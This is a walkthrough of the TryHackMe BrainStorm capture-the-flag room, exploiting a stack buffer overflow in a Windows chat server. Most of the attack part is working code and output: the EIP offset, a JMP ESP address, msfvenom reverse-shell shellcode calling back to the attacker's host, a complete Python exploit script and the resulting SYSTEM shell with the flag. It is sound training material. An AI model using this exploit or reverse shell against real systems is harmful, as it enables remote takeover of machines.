thm-brainstorm-nl

NOTICE (SPOILER!): if you want to solve this room yourself, don't read further.

Today let's play TryHackMe's BrainStorm at

https://tryhackme.com/room/brainstorm

Enumeration

Run nmap to scan the ports

nmap -sS -sV -A -Pn 10.10.239.61

The scan shows 3 open ports: 21 (FTP), 3389 (RDP) and 9999 (the chat server). Port 21 allows anonymous FTP access.

Check the FTP port

Log in to the FTP service with the anonymous account

Use dir to list the FTP directory

Enter the directory and look around: it holds two files, chatserver.exe and essfunc.dll. This is the chat server program the target runs on port 9999.

Switch to binary mode and download both files for analysis. (Without binary mode, the two downloaded files will be missing dozens of bytes, because ASCII mode rewrites line-ending bytes inside the binaries, and they will not run.)

Analyzing chatserver.exe

Open chatserver.exe with Immunity Debugger

Generate a cyclic pattern (pattern_create) to use as test input.

Send the pattern to the server with a short Python script.

The buffer overflows and EIP is overwritten with 31704330.

Feed that value to pattern_offset. The offset is 2012: the 2012 bytes before the return address are 2008 bytes of buffer plus the 4-byte saved EBP, and the next 4 bytes of input land in EIP.

So we know exactly where EIP sits in the input, which means we control EIP.
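To make the offset step concrete, here is an added Python example (not part of the original writeup) that reimplements what pattern_create and pattern_offset do and recovers the 2012 from the EIP value 31704330 seen above. It assumes the pattern that was sent was at least 3000 bytes long; the writeup does not state the length, so that is an assumption.

```python
"""
Added example (not from the original writeup): reproduce the cyclic-pattern
offset calculation that pattern_create.rb / pattern_offset.rb perform, using
the EIP value 0x31704330 observed in Immunity Debugger.
"""
import string
import struct


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern: Aa0Aa1Aa2 ... Zz9 (20280 unique bytes).

    Every 3-byte triplet (upper, lower, digit) is unique, so any 4 bytes that
    end up in EIP identify a single position in the pattern.
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("a pattern longer than 20280 bytes is no longer unique")


def pattern_offset(eip_value: int, length: int = 3000) -> int:
    """Offset into the pattern of the 4 bytes that overwrote EIP.

    eip_value is the register value as shown by the debugger (0x31704330).
    x86 is little-endian, so the bytes that sat in memory are the reverse
    order of the displayed value: 30 43 70 31 == b"0Cp1".
    `length` is an assumption about how long the sent pattern was; it only
    has to be at least as long as the real one.
    """
    needle = struct.pack("<I", eip_value)          # 0x31704330 -> b"0Cp1"
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError(f"{eip_value:#010x} ({needle!r}) not found in pattern")
    return idx


def stack_layout(offset: int) -> dict:
    """Split the offset the way the writeup does: buffer, saved EBP, then EIP."""
    return {
        "buffer": offset - 4,          # 2008 bytes of local buffer
        "saved_ebp": 4,                # overwritten saved frame pointer
        "eip_at": offset,              # next 4 bytes of input become EIP
    }


if __name__ == "__main__":
    off = pattern_offset(0x31704330)
    print(f"EIP offset: {off}")        # 2012
    print(stack_layout(off))
```

Run it as-is and it prints 2012; change the value passed to pattern_offset to whatever your debugger showed and it gives the offset for that crash instead.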

Control EIP

Use !mona jmp -r esp to find JMP ESP instructions in memory

This article uses the address 0x62501527 for the payload. (The final shell.py further down in this post uses a different one, 0x625014df, from the same DLL.)

Note that mona reports ASLR and SafeSEH as disabled for this module, so the address can be hard-coded.

In the payload the JMP ESP address is written little-endian (bytes reversed) in hex form: '\x27\x15\x50\x62'

Exploit Development

Use msfvenom to generate a test payload that pops calc.exe, excluding the bad characters \x00 and \x0A

root@kali:~/thm/brainstorm# msfvenom -p windows/exec -b '\x00\x0A' -f python CMD=calc.exe EXITFUNC=thread
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of python file: 1060 bytes
buf = ""
buf += "\xdb\xd8\xd9\x74\x24\xf4\x5d\x31\xc9\xb1\x31\xb8\xb1"
buf += "\xc8\x5c\x5b\x83\xc5\x04\x31\x45\x14\x03\x45\xa5\x2a"
buf += "\xa9\xa7\x2d\x28\x52\x58\xad\x4d\xda\xbd\x9c\x4d\xb8"
buf += "\xb6\x8e\x7d\xca\x9b\x22\xf5\x9e\x0f\xb1\x7b\x37\x3f"
buf += "\x72\x31\x61\x0e\x83\x6a\x51\x11\x07\x71\x86\xf1\x36"
buf += "\xba\xdb\xf0\x7f\xa7\x16\xa0\x28\xa3\x85\x55\x5d\xf9"
buf += "\x15\xdd\x2d\xef\x1d\x02\xe5\x0e\x0f\x95\x7e\x49\x8f"
buf += "\x17\x53\xe1\x86\x0f\xb0\xcc\x51\xbb\x02\xba\x63\x6d"
buf += "\x5b\x43\xcf\x50\x54\xb6\x11\x94\x52\x29\x64\xec\xa1"
buf += "\xd4\x7f\x2b\xd8\x02\xf5\xa8\x7a\xc0\xad\x14\x7b\x05"
buf += "\x2b\xde\x77\xe2\x3f\xb8\x9b\xf5\xec\xb2\xa7\x7e\x13"
buf += "\x15\x2e\xc4\x30\xb1\x6b\x9e\x59\xe0\xd1\x71\x65\xf2"
buf += "\xba\x2e\xc3\x78\x56\x3a\x7e\x23\x3c\xbd\x0c\x59\x72"
buf += "\xbd\x0e\x62\x22\xd6\x3f\xe9\xad\xa1\xbf\x38\x8a\x4e"
buf += "\x22\xe9\xe6\xe6\xfb\x78\x4b\x6b\xfc\x56\x8f\x92\x7f"
buf += "\x53\x6f\x61\x9f\x16\x6a\x2d\x27\xca\x06\x3e\xc2\xec"
buf += "\xb5\x3f\xc7\x8e\x58\xac\x8b\x7e\xff\x54\x29\x7f"

Generating the working shellcode

root@kali:~/thm# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.3.122 LPORT=7777 -b"\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] = 
"\xbf\xe9\xe6\x28\x5f\xda\xd7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x31\x7a\x12\x83\xea\xfc\x03\x93\xe8\xca\xaa\x9f\x1d\x88"
"\x55\x5f\xde\xed\xdc\xba\xef\x2d\xba\xcf\x40\x9e\xc8\x9d\x6c"
"\x55\x9c\x35\xe6\x1b\x09\x3a\x4f\x91\x6f\x75\x50\x8a\x4c\x14"
"\xd2\xd1\x80\xf6\xeb\x19\xd5\xf7\x2c\x47\x14\xa5\xe5\x03\x8b"
"\x59\x81\x5e\x10\xd2\xd9\x4f\x10\x07\xa9\x6e\x31\x96\xa1\x28"
"\x91\x19\x65\x41\x98\x01\x6a\x6c\x52\xba\x58\x1a\x65\x6a\x91"
"\xe3\xca\x53\x1d\x16\x12\x94\x9a\xc9\x61\xec\xd8\x74\x72\x2b"
"\xa2\xa2\xf7\xaf\x04\x20\xaf\x0b\xb4\xe5\x36\xd8\xba\x42\x3c"
"\x86\xde\x55\x91\xbd\xdb\xde\x14\x11\x6a\xa4\x32\xb5\x36\x7e"
"\x5a\xec\x92\xd1\x63\xee\x7c\x8d\xc1\x65\x90\xda\x7b\x24\xfd"
"\x2f\xb6\xd6\xfd\x27\xc1\xa5\xcf\xe8\x79\x21\x7c\x60\xa4\xb6"
"\x83\x5b\x10\x28\x7a\x64\x61\x61\xb9\x30\x31\x19\x68\x39\xda"
"\xd9\x95\xec\x4d\x89\x39\x5f\x2e\x79\xfa\x0f\xc6\x93\xf5\x70"
"\xf6\x9c\xdf\x18\x9d\x67\x88\x2c\x69\x64\x32\x59\x6f\x6a\xdc"
"\xf8\xe6\x8c\x8a\xea\xae\x07\x23\x92\xea\xd3\xd2\x5b\x21\x9e"
"\xd5\xd0\xc6\x5f\x9b\x10\xa2\x73\x4c\xd1\xf9\x29\xdb\xee\xd7"
"\x45\x87\x7d\xbc\x95\xce\x9d\x6b\xc2\x87\x50\x62\x86\x35\xca"
"\xdc\xb4\xc7\x8a\x27\x7c\x1c\x6f\xa9\x7d\xd1\xcb\x8d\x6d\x2f"
"\xd3\x89\xd9\xff\x82\x47\xb7\xb9\x7c\x26\x61\x10\xd2\xe0\xe5"
"\xe5\x18\x33\x73\xea\x74\xc5\x9b\x5b\x21\x90\xa4\x54\xa5\x14"
"\xdd\x88\x55\xda\x34\x09\x65\x91\x14\x38\xee\x7c\xcd\x78\x73"
"\x7f\x38\xbe\x8a\xfc\xc8\x3f\x69\x1c\xb9\x3a\x35\x9a\x52\x37"
"\x26\x4f\x54\xe4\x47\x5a";
root@kali:~/thm# gedit shell.py

The payload above is a reverse TCP shell (not a bind shell): it connects back to 10.11.3.122 on port 7777, and the encoder has removed the bad character \x00.

With that shellcode we write the Python exploit, which sends the following layout

Payload = 2012 bytes junk + 4 bytes EIP (JMP ESP address) + 32 bytes NOPs + shellcode

Run the Python exploit script (once the calc.exe test payload has been confirmed to pop a calculator)
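The layout above, as an added Python example (not the writeup's shell.py): it packs the JMP ESP address little-endian, assembles junk + EIP + NOP sled + shellcode, and refuses to build if the address or the shellcode contains a bad character. It also produces the classic bad-character test buffer used to find \x00 and \x0A in the first place. The shellcode used when running it is a placeholder of INT3 bytes, not real shellcode, and the send_payload helper (which mirrors the login exchange shell.py drives) is my own addition, not the author's.

```python
"""
Added example (not the writeup's shell.py): build and sanity-check the
overflow payload before anything is sent.  The constants come from the
writeup: offset 2012, JMP ESP 0x62501527 in essfunc.dll, bad chars \x00 \x0a.
"""
import socket
import struct

OFFSET = 2012                      # bytes of input before the return address
JMP_ESP = 0x62501527               # JMP ESP in essfunc.dll (!mona jmp -r esp)
BADCHARS = b"\x00\x0a"             # NUL and LF break this line-based protocol
NOP_SLED = b"\x90" * 32            # ESP points just past EIP; slide into shellcode


def eip_bytes(addr: int) -> bytes:
    """Little-endian encoding of the address, as it must appear in the input."""
    return struct.pack("<I", addr)          # 0x62501527 -> b"\x27\x15\x50\x62"


def bad_chars_in(data: bytes, badchars: bytes = BADCHARS) -> set:
    """Set of bad characters that occur in data (empty set means safe)."""
    return {b for b in badchars if b in data}


def badchar_test_buffer(badchars: bytes = BADCHARS) -> bytes:
    """Every byte 0x01..0xff except the ones already known to be bad.

    Sent after the EIP overwrite and compared with memory at ESP in the
    debugger: the first byte that was mangled is the next bad char to drop.
    """
    return bytes(b for b in range(1, 256) if b not in badchars)


def build_payload(shellcode: bytes, offset: int = OFFSET, jmp_esp: int = JMP_ESP,
                  nops: bytes = NOP_SLED, badchars: bytes = BADCHARS) -> bytes:
    """junk + EIP (little-endian JMP ESP) + NOP sled + shellcode, checked."""
    eip = eip_bytes(jmp_esp)
    for name, part in (("JMP ESP address", eip), ("shellcode", shellcode)):
        bad = bad_chars_in(part, badchars)
        if bad:
            raise ValueError(f"{name} contains bad chars: {[hex(b) for b in bad]}")
    return b"A" * offset + eip + nops + shellcode


def send_payload(host: str, port: int, username: bytes, payload: bytes,
                 timeout: float = 5.0) -> None:
    """Drive the chat server's prompts the same way shell.py does and deliver
    the payload as the chat message.  Network call; not exercised offline."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)                         # banner
        s.recv(1024)                         # username prompt
        s.sendall(username + b"\r\n")
        s.recv(1024)                         # message prompt
        s.sendall(payload + b"\r\n")         # the overflow happens here


if __name__ == "__main__":
    placeholder = b"\xcc" * 8                # INT3s, stand-in for real shellcode
    p = build_payload(placeholder)
    print(len(p), p[OFFSET:OFFSET + 4].hex())   # 2056 27155062
    print(len(badchar_test_buffer()))           # 254
```

Swap the placeholder for the msfvenom output and call send_payload with the target address and a listener running; the ValueError check is what catches a JMP ESP address or shellcode that would be corrupted in transit.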

The final working script is also published at

https://github.com/puckiestyle/python/blob/master/thm-brainstorm-revshell.py

root@kali:~/thm# cat shell.py 
import socket
import sys

username = b"puckie"

# 2012 bytes of junk, the JMP ESP address from essfunc.dll (0x625014df,
# little-endian) that lands in EIP, then a 32-byte NOP sled ESP points into
message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32

#generated with msfvenom -p windows/shell_reverse_tcp LHOST=10.11.3.122 LPORT=7777 -b"\x00" -f c

payload = (b"\xbf\xe9\xe6\x28\x5f\xda\xd7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
b"\x52\x31\x7a\x12\x83\xea\xfc\x03\x93\xe8\xca\xaa\x9f\x1d\x88"
b"\x55\x5f\xde\xed\xdc\xba\xef\x2d\xba\xcf\x40\x9e\xc8\x9d\x6c"
b"\x55\x9c\x35\xe6\x1b\x09\x3a\x4f\x91\x6f\x75\x50\x8a\x4c\x14"
b"\xd2\xd1\x80\xf6\xeb\x19\xd5\xf7\x2c\x47\x14\xa5\xe5\x03\x8b"
b"\x59\x81\x5e\x10\xd2\xd9\x4f\x10\x07\xa9\x6e\x31\x96\xa1\x28"
b"\x91\x19\x65\x41\x98\x01\x6a\x6c\x52\xba\x58\x1a\x65\x6a\x91"
b"\xe3\xca\x53\x1d\x16\x12\x94\x9a\xc9\x61\xec\xd8\x74\x72\x2b"
b"\xa2\xa2\xf7\xaf\x04\x20\xaf\x0b\xb4\xe5\x36\xd8\xba\x42\x3c"
b"\x86\xde\x55\x91\xbd\xdb\xde\x14\x11\x6a\xa4\x32\xb5\x36\x7e"
b"\x5a\xec\x92\xd1\x63\xee\x7c\x8d\xc1\x65\x90\xda\x7b\x24\xfd"
b"\x2f\xb6\xd6\xfd\x27\xc1\xa5\xcf\xe8\x79\x21\x7c\x60\xa4\xb6"
b"\x83\x5b\x10\x28\x7a\x64\x61\x61\xb9\x30\x31\x19\x68\x39\xda"
b"\xd9\x95\xec\x4d\x89\x39\x5f\x2e\x79\xfa\x0f\xc6\x93\xf5\x70"
b"\xf6\x9c\xdf\x18\x9d\x67\x88\x2c\x69\x64\x32\x59\x6f\x6a\xdc"
b"\xf8\xe6\x8c\x8a\xea\xae\x07\x23\x92\xea\xd3\xd2\x5b\x21\x9e"
b"\xd5\xd0\xc6\x5f\x9b\x10\xa2\x73\x4c\xd1\xf9\x29\xdb\xee\xd7"
b"\x45\x87\x7d\xbc\x95\xce\x9d\x6b\xc2\x87\x50\x62\x86\x35\xca"
b"\xdc\xb4\xc7\x8a\x27\x7c\x1c\x6f\xa9\x7d\xd1\xcb\x8d\x6d\x2f"
b"\xd3\x89\xd9\xff\x82\x47\xb7\xb9\x7c\x26\x61\x10\xd2\xe0\xe5"
b"\xe5\x18\x33\x73\xea\x74\xc5\x9b\x5b\x21\x90\xa4\x54\xa5\x14"
b"\xdd\x88\x55\xda\x34\x09\x65\x91\x14\x38\xee\x7c\xcd\x78\x73"
b"\x7f\x38\xbe\x8a\xfc\xc8\x3f\x69\x1c\xb9\x3a\x35\x9a\x52\x37"
b"\x26\x4f\x54\xe4\x47\x5a")

try:
    print("Sending the payload ...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # target IP at the time of the final run (the nmap scan earlier was against 10.10.239.61)
    s.connect(('10.10.190.194', 9999))
    s.recv(1024)                            # banner
    s.recv(1024)                            # username prompt
    s.send(username + b'\r\n')
    s.recv(1024)                            # message prompt
    s.send(message + payload + b'\r\n')     # the overflow happens here
    s.recv(1024)
    s.close()

except OSError as err:
    print("Cannot connect to the server ...", err)
    sys.exit(1)

root@kali:~/thm#


Check whoami and read the flag file

root@kali:~/thm# nc -nlvp 7777
listening on [any] 7777 ...
connect to [10.11.3.122] from (UNKNOWN) [10.10.190.194] 49206
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Users\drake\Desktop>type root.txt
type root.txt
5b1001de5a44eca47eee71e7942a8f8a
C:\Users\drake\Desktop>systeminfo
systeminfo

Host Name: BRAINSTORM
OS Name: Microsoft Windows 7 Ultimate 
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: drake
Registered Organization: 
Product ID: 00426-292-0000007-85799
Original Install Date: 8/29/2019, 10:20:47 PM
System Boot Time: 5/29/2020, 3:05:43 AM
System Manufacturer: Xen
System Model: HVM domU
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
BIOS Version: Xen 4.2.amazon, 8/24/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,048 MB
Available Physical Memory: 1,509 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,389 MB
Virtual Memory: In Use: 706 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB2621440
[02]: KB976902
Network Card(s): 1 NIC(s) Installed.
[01]: AWS PV Network Device
Connection Name: Local Area Connection 2
DHCP Enabled: Yes
DHCP Server: 10.10.0.1
IP address(es)
[01]: 10.10.190.194
[02]: fe80::9839:cf64:53c8:aba2

C:\Users\drake\Desktop>

If you need the files to exploit chatserver locally, its exe and dll are at https://github.com/puckiestyle/pentest/blob/master/chatserver.zip

Author : PuckieStyle
